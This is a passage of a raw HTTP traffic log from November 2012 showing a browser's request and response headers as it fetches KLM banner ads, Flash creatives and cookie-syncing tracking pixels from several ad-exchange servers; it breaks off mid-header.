Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /010921/loaderxml.swf HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/0.6.39
Date: Sun, 18 Nov 2012 01:30:40 GMT
Content-Length: 177
Last-Modified: Tue, 13 Nov 2012 14:10:39 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4054&creative_id=378898&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&exch_id=7&line_item_id=1882693&b=rh56.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&us_id=5543&invite_uid=&pub_line_item_id=87821&mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&inv_size_id=146840&campaign_id=252144&p_us_id=28812 HTTP/1.1

Host: eeu.rtb.prod2.invitemedia.com
GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4054&amp;creative_id=378898&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1882693&amp;b=rh56.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&amp;us_id=5543&amp;invite_uid=&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146840&amp;campaign_id=252144&amp;p_us_id=28812 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html
Connection: close
Content-Length: 3621
Date: Sun, 18 Nov 2012 01:30:40 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(7.3.1.v20110307)
GET /010921/feed.xml?0.327968226745725 HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: nginx/0.6.39
Date: Sun, 18 Nov 2012 01:30:40 GMT
Content-Length: 2267
Last-Modified: Tue, 13 Nov 2012 14:10:39 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /load/?p=204&g=071&j=0&buid=7577C4DA-3995-4153-9A0B-7C9927BF1013 HTTP/1.1

Host: loadm.exelator.com
GET /load/?p=204&amp;g=071&amp;j=0&amp;buid=7577C4DA-3995-4153-9A0B-7C9927BF1013 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24364
HTTP/1.1 302 Found

Content-Type: image/gif
X-Powered-By: PHP/5.3.18
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Set-Cookie: ud=eJxrWVyWWnRgUUnxaccrWnwTNGZtXhzq6XKLQcHCMM3E0Dgx2TLFNNk8xdjQzNDU3NTYzCjR1NAsOcXSZHFRShojAP4pFW0%253D; expires=Mon, 18-Mar-2013 01:30:40 GMT; path=/; domain=exelator.com
Location: http://loadm.exelator.com/load/?p=204&amp;g=071&amp;j=0&amp;buid=7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;xl8blockcheck=1
Content-Length: 0
Connection: close
Date: Sun, 18 Nov 2012 01:30:40 GMT
Server: HTTP server
GET /AdServer/SPug HTTP/1.1

Host: image4.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=28596&amp;s=28597
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:40 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
GET /010921/728x90_christmas2.jpg HTTP/1.1

Host: banners.klm.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/0.6.39
Date: Sun, 18 Nov 2012 01:30:40 GMT
Content-Length: 21146
Last-Modified: Tue, 13 Nov 2012 14:10:39 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /pubmatic_sync?pubmatic_callback=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA=&piggybackCookie= HTTP/1.1

Host: pixel.invitemedia.com
GET /pubmatic_sync?pubmatic_callback=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA=&amp;piggybackCookie= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=28596&amp;s=28597
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sun, 18 Nov 2012 01:30:40 GMT
Set-Cookie: uid=3f62d100-dd98-4006-b187-452598b27a1b;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&amp;piggybackCookie=3f62d100-dd98-4006-b187-452598b27a1b.
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /data_sync?partner_id=230&exchange_id=8 HTTP/1.1

Host: pixel.invitemedia.com
GET /data_sync?partner_id=230&amp;exchange_id=8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4054&amp;creative_id=378898&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1882693&amp;b=rh56.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&amp;us_id=5543&amp;invite_uid=&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146840&amp;campaign_id=252144&amp;p_us_id=28812
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:40 GMT
Set-Cookie: uid=3ef3e40d-6257-47f1-82b7-53952560a80d;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT dp_rec=&quot;{\&quot;4\&quot;:1353202240}&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 590
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /uploaded_creatives/a5dd4f73ae89c71e62a767f8369ea8bcc746cef9.swf?clickTAG=http%3A%2F%2Feeu.pixel.prod2.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26b%3Drh56.ovq.wiz.cebq2%26message%3DeJwNzDEOwzAMQ9G7cLYBS5ZsSVuS9jQJnCnoUPTu1frAzy8IgUbH26XNKqpapTlVHyb1xTTpGNu2k6NAEarSCyaCzYgLGDELBoIkg1bQU8iMh.eu5_ezznV_VuaCWM91JafbNKbfH5XaG7c-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DtG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url%253Dhttp%25253A%25252F%25252Fwww.porsgrundbad.no%25252Fsmart%25253Futm_source%25253DNB-AdExchange%252526utm_medium%25253Dcpm%252526utm_content%25253Dnorja%252526utm_campaign%25253DNB-smart HTTP/1.1

Host: cdn.invitemedia.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4054&amp;creative_id=378898&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1882693&amp;b=rh56.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&amp;us_id=5543&amp;invite_uid=&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146840&amp;campaign_id=252144&amp;p_us_id=28812
HTTP/1.0 200 OK

Content-Type: application/x-shockwave-flash
Content-Length: 37541
Connection: keep-alive
x-amz-id-2: wPCfh2q/Cj6lBOnsMmrpTUyapPfAr3Ya5MCYte6V4wSURpiAxF37mL7OcMlnD+eW
x-amz-request-id: 04615480ABB58D6C
Date: Mon, 29 Oct 2012 07:07:26 GMT
Last-Modified: Mon, 29 Oct 2012 07:02:43 GMT
Etag: &quot;3be67b42fca7b60770c77cbb36dc1e7a&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 25956
X-Amz-Cf-Id: c5JkkEiOr8d-YG7JwRbMcVzbLTFyLxwzrgVgOQEl-5kCKXnIN9i78Q==
Via: 1.0 73b2260ef82148769c66cb4d6ae4f210.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /load/?p=204&g=071&j=0&buid=7577C4DA-3995-4153-9A0B-7C9927BF1013&xl8blockcheck=1 HTTP/1.1

Host: loadm.exelator.com
GET /load/?p=204&amp;g=071&amp;j=0&amp;buid=7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;xl8blockcheck=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24364
Cookie: ud=eJxrWVyWWnRgUUnxaccrWnwTNGZtXhzq6XKLQcHCMM3E0Dgx2TLFNNk8xdjQzNDU3NTYzCjR1NAsOcXSZHFRShojAP4pFW0%253D
HTTP/1.1 302 Found

Content-Type: image/gif
X-Powered-By: PHP/5.3.17
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Set-Cookie: inv=eJxrXFySlnaHQeLMGXfms%252BocS4wMTczBxFl1bgSHAcE8c4aBEYnLgMIDAAJpF0Q%253D; expires=Mon, 18-Mar-2013 01:30:40 GMT; path=/; domain=exelator.com xud=eJyNz09Og0AUBnA0rj0DC1cmGAZmGFgOhVaSliH8iWFFKAyRpC0JYFuXJu71AC5MaWxqNR7EuHPV00haDuDy%252B%252FJ77%252BU9NnNWnq3q6pv8Xp4%252FX729rJeTevLUBJax53gVZBDIcaKlKMGpDBSAMJIVKUZASVIN7u7yNPIkETqBvucuMMK4Bw0iyJqGBAiQLGhE1AXc0zQJ630gAvlzHg1MGvVoYPtuuLLpx7FwzYFF7RWQ3jtg%252BeGaVpNie8zGiHAddajnk%252BHr1zER1yTtOsPkWhmQyA8dc6OXxaJi5e7Q9MnIGoabfl6yrFhuDh31tjf5LG0Vj7sLlue0LzvFgpU%252BS255a5YV5TSu82LGe%252FdVzaYVT7wOU3fwf2yb%252FmkTkOt2QkkzPE7iVGRQBkjNkITEGGFFTGKVqWPQjLPs4edkvpYAxH%252B0n43I; expires=Mon, 18-Mar-2013 01:30:40 GMT; path=/; domain=exelator.com xudx=eJwBLwDQ%252F4OjdmVyAqJ0c8tB1CoOkC6mnKNldniBzQhjgc5QqDpBmc0nCwHMzEcBAAHNAXYB%252BC0TRw%253D%253D; expires=Mon, 18-Mar-2013 01:30:40 GMT; path=/; domain=exelator.com udo=eJyNkE1Og1AURqEDNTFxDQxMTExqeMDjwfC1pUjSAuEnhhGh8FCStiSAtC7AsS6gA1Mam1qNC7GdOepqJG0X4PA7Od%252B9ufe5KknWmBf5D%252F69vni9eZ9VpJzOtlfn9PYsPN1s1BOaord0SS%252Bmw2L4UrlaZ0cxEogFwAehHMEQRTwQAUSQF7kAAjGMZGH9mES%252BzbGC6bZ21CWCCLWFDm7ysgybAoB8U8Zsq4nassyhVhewgP8qfVUx%252FLbh6o7lzXXj8wAsRdUMfQ64j6OgOd7CyIfp6pA7fUwdVdOwHdx7%252Bz4kbCm4HtdRqNp0se94prJsZekkJ9l6T7q4r%252FW8ZTfJSJxOl3tm2Ku7ZBzVFoOOGzTbrE820wnJHBI%252BMNo4TrNRUCTpmLGf8oKMcgbbR9mw1P%252FLuuI0Khff1g0xitEgDCKWCDyAUgw5yAYQiWwYSEQagEWaJff1V%252F4AW5CUUA%253D%253D; expires=Mon, 18-Mar-2013 01:30:40 GMT; path=/; domain=exelator.com ud=eJxrWVyWWnRgUUnxaccrWnwT9NbvWBzq6XKLQcHCMM3E0Dgx2TLFNNk8xdjQzNDU3NTYzCjR1NAsOcXSZEl%252BUWb6Ij9%252FAElfF0E%253D; expires=Mon, 18-Mar-2013 01:30:40 GMT; path=/; domain=exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Connection: close
Date: Sun, 18 Nov 2012 01:30:40 GMT
Server: HTTP server
GET /pubm_imp?returnType=image&key=AdImp&cost=405400&ex_uid=7_7577C4DA-3995-4153-9A0B-7C9927BF1013&creativeID=378898&message=eJwNzDEOwzAMQ9G7cLYBS5ZsSVuS9jQJnCnoUPTu1frAzy8IgUbH26XNKqpapTlVHyb1xTTpGNu2k6NAEarSCyaCzYgLGDELBoIkg1bQU8iMh.eu5_ezznV_VuaCWM91JafbNKbfH5XaG7c-&managed=false&b=rh56.ovq.wiz.cebq2 HTTP/1.1

Host: eeu.pixel.prod2.invitemedia.com
GET /pubm_imp?returnType=image&amp;key=AdImp&amp;cost=405400&amp;ex_uid=7_7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;creativeID=378898&amp;message=eJwNzDEOwzAMQ9G7cLYBS5ZsSVuS9jQJnCnoUPTu1frAzy8IgUbH26XNKqpapTlVHyb1xTTpGNu2k6NAEarSCyaCzYgLGDELBoIkg1bQU8iMh.eu5_ezznV_VuaCWM91JafbNKbfH5XaG7c-&amp;managed=false&amp;b=rh56.ovq.wiz.cebq2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4054&amp;creative_id=378898&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1882693&amp;b=rh56.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&amp;us_id=5543&amp;invite_uid=&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146840&amp;campaign_id=252144&amp;p_us_id=28812
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sun, 18 Nov 2012 01:30:40 GMT
Set-Cookie: camp_freq_p1=&quot;eJzjkuH4sJFfgFHiwJcFrawKjBoHpi9rZTVgtADzAZ0HCv0=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT;Max-Age=31536000 exchange_uid=&quot;eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XX0=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT;Max-Age=31536000 uid=f45883da-a5b2-4229-92e5-ccb518d47872;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 01:30:40 GMT impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkBEAClwTeA==&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 18-Nov-2013 